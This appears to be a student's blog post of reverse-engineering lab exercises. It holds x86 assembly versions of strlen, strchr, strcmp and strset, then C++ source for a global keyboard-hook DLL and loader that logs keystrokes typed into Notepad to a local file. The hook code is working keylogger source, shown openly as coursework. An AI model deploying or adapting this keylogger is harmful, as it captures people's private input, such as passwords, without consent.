12.24逆向工程上机作业整理

 

 

.386
.model flat, stdcall

include kernel32.inc
includelib kernel32.lib

include msvcrt.inc
includelib msvcrt.lib

.data
szText    db    "Reverse Engineering", 0
format    db    "length = %d", 0AH, 0

.code

main PROC
    LEA EDI, szText
    MOV ECX,0FFFFFFFFH
    MOV AL,0
    MOV BL,0
    RE:
        CMP BYTE PTR [EDI],BL
        JZ EXIT
        INC EDI
        INC AX
        JMP RE
    EXIT:
    
    INVOKE crt_printf, addr format, AL
    INVOKE crt_getchar
    INVOKE ExitProcess, 0
main ENDP

END main
strlen
 1 .386
 2 .model flat, stdcall
 3 
 4 include kernel32.inc
 5 includelib kernel32.lib
 6 
 7 include msvcrt.inc
 8 includelib msvcrt.lib
 9 
10 .data
11 szText    db    "Reverse Engineering", 0
12 chr        db    'i'
13 format    db    "%d", 0AH, 0
14 
15 .code
16 
17 main PROC
18     LEA EDI, szText
19     MOV ECX,0FFFFFFFFH
20     ;LEA AX,chr
21     MOV BL,CHR
22     MOV AL,0
23     RE:
24         CMP BYTE PTR [EDI],BL
25         JZ EXIT
26         INC EDI
27         INC AL
28         JMP RE
29     EXIT:
30     
31     
32     INVOKE crt_printf, addr format, AL
33     INVOKE crt_getchar
34     INVOKE ExitProcess, 0
35 main ENDP
36 
37 END main
strchr
 1 .386
 2 .model flat, stdcall
 3 
 4 include kernel32.inc
 5 includelib kernel32.lib
 6 
 7 include msvcrt.inc
 8 includelib msvcrt.lib
 9 
10 .data
11 format        db    "%d", 0AH, 0
12 szText        db    "Reverse Engineering", 0
13 szText2        db    "Reverse Engineering", 0    ;szText==szText2
14 szText3        db    "Reverse Eng", 0            ;szText>szText3
15 szText4        db    "Reverse Engj", 0            ;szText<szText4
16 szText5        db    "Reverse Engh", 0            ;szText>szText5
17 
18 .code
19 
20 main PROC
21     LEA ESI, szText
22     ;LEA EDI, szText2    ;result=0
23     ;LEA EDI, szText3    ;result=1
24     ;LEA EDI, szText4    ;result=-1
25     LEA EDI, szText5    ;result=1
26 START:                        
27     lodsb                    ;将ds:esi的第一个字节装入寄存器AL,同时[esi]+1
28     scasb                    ;将es:edi的第一个字节和AL相减,同时[edi]+1
29     jne NOTEQ                ;为0时跳转
30     test al,al                
31     jne START            
32     xor eax,eax                ;将EAX置0
33     jmp ENDCMP                
34 NOTEQ:                      
35     mov eax,1                
36     jg ENDCMP                ;jl是小于
37     neg eax                    
38 ENDCMP:     
39     
40     
41     INVOKE crt_printf, addr format, EAX
42 
43     INVOKE crt_getchar
44     INVOKE ExitProcess, 0
45 main ENDP
46 
47 END main
strcmp
 1 .386
 2 .model flat, stdcall
 3 
 4 include kernel32.inc
 5 includelib kernel32.lib
 6 
 7 include msvcrt.inc
 8 includelib msvcrt.lib
 9 
10 .data
11 szText    db    "Reverse Engineering", 0
12 chr        db    'j'
13 
14 .code
15 
16 main PROC
17     LEA EDI, szText
18     MOV ECX,0FFFFFFFFH
19     MOV BL,CHR
20     RE:
21         CMP BYTE PTR [EDI],BL
22         JZ EXIT
23         MOV [EDI],BL
24         INC EDI
25         JMP RE
26     EXIT:
27     INVOKE crt_printf, addr szText
28 
29     INVOKE crt_getchar
30     INVOKE ExitProcess, 0
31 main ENDP
32 
33 END main
strset

#include "stdio.h"
#include "windows.h"
#include<fstream>
#include<iostream>
HINSTANCE g_hInstance = NULL;
HHOOK g_hHook = NULL;
HWND g_hWnd = NULL;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved) {//第三个参数没有意义
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        g_hInstance = hinstDLL;
        break;

    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){
    char szPath[MAX_PATH] = { 0, };
    char *p = NULL;



    if (nCode >= 0) {
        std::ofstream out("D:\\reverse\\input.txt", std::ios::app);
        //输出流,记录键值
        // bit 31 : 0 => press, 1 => release
        if (!(lParam & 0x80000000)) {
            GetModuleFileNameA(NULL, szPath, MAX_PATH);
            p = strrchr(szPath, '\\');
            //若加载当前DLL的进程的可执行文件名称为notepad.exe,则消息不会传递给下一个钩子
            if (!_stricmp(p + 1, "notepad.exe")) {
                    BYTE   ks[256];
                    GetKeyboardState(ks);
                    WORD   w;
                    UINT   scan;
                    scan = 0;
                    ToAscii(wParam, scan, ks, &w, 0);
                    char ch = (char)w;
                    out << ch;
            }
        }
        out.close();
    }
    // 当前进程不是notepad.exe,将消息传递给下一个钩子

    return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}

#ifdef __cplusplus
extern "C" {
#endif
    __declspec(dllexport) void HookStart() {
        g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0);
    }

    __declspec(dllexport) void HookStop() {
        if (g_hHook) {
            UnhookWindowsHookEx(g_hHook);
            g_hHook = NULL;
        }
    }
#ifdef __cplusplus
}
#endif
KeyHook.dll
#include "stdio.h"
#include "conio.h"
#include "windows.h"

#define    DEF_DLL_NAME        "KeyHook.dll"
#define    DEF_HOOKSTART        "HookStart"
#define    DEF_HOOKSTOP        "HookStop"

typedef void (*PFN_HOOKSTART)();
typedef void (*PFN_HOOKSTOP)();

void main()
{
    HMODULE            hDll = NULL;
    PFN_HOOKSTART    HookStart = NULL;
    PFN_HOOKSTOP    HookStop = NULL;
    char            ch = 0;

    // KeyHook.dll
    hDll = LoadLibraryA(DEF_DLL_NAME);
    if( hDll == NULL )
    {
        printf("LoadLibrary(%s) failed!!! [%d]", DEF_DLL_NAME, GetLastError());
        return;
    }

    // export
    HookStart = (PFN_HOOKSTART)GetProcAddress(hDll, DEF_HOOKSTART);
    HookStop = (PFN_HOOKSTOP)GetProcAddress(hDll, DEF_HOOKSTOP);


    HookStart();


    printf("press 'q' to quit!\n");
    while( _getch() != 'q' )    ;


    HookStop();
    
  
    FreeLibrary(hDll);
}
HookMain.cpp

 

posted @ 2017-12-24 20:07  Elpsywk  阅读(743)  评论(0编辑  收藏  举报